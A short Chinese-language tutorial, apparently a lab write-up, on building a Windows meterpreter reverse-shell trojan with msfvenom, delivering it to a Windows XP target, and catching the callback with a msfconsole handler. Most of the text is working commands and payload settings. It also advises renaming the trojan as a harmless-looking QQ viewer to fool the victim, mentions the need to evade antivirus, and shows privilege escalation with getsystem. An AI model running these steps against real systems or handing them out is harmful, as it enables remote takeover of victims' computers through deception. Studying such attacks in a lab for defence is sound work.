实验环境:
攻击者:
kali Linux ip
:
192.168.3.101
靶机:
Windows xp ip
:
192.168.3.102
思路:
利用
msfvenom
制作
.exe
文件,然后发送到靶
机
Windows xp
上面,运行后就可以在
kali linux
上面利用
msfconsole
连接
msfvenom
服务控制靶
机
1.
在
kali Linux
上面启动一个终端执行以下命令
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.3.101
lport=4444 -f exe >test.exe
(
输出文件到当前目录下
)
-p
选择一个
payload
-f
生成的文件格式
在这里,我们生成一个
test.exe
的木马文件
(文件在
root
文件夹下),控制端的
ip
为
192.168.3.101
,端口号为
4444
。然后利用这
个木马传给靶机,可以改一改名字,比如
QQ
坦白说查看器之类的,杀毒软件可能报毒,其
实是需要免杀处理的
2.
利用
msfconsole
监听
输入以下命令:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.3.101
set lport 4444
run
handler -H ip -P
端口
-p
windows/meterpreter/reverse_tcp
快速建立监听通道
3.等待受害者点击test.exe文件
运行
4.文件被受害者点击运行后,
可以看到当前用户权限为
lll
使用
getsystem
命令获取系统最高用户的权限,可以进一步渗透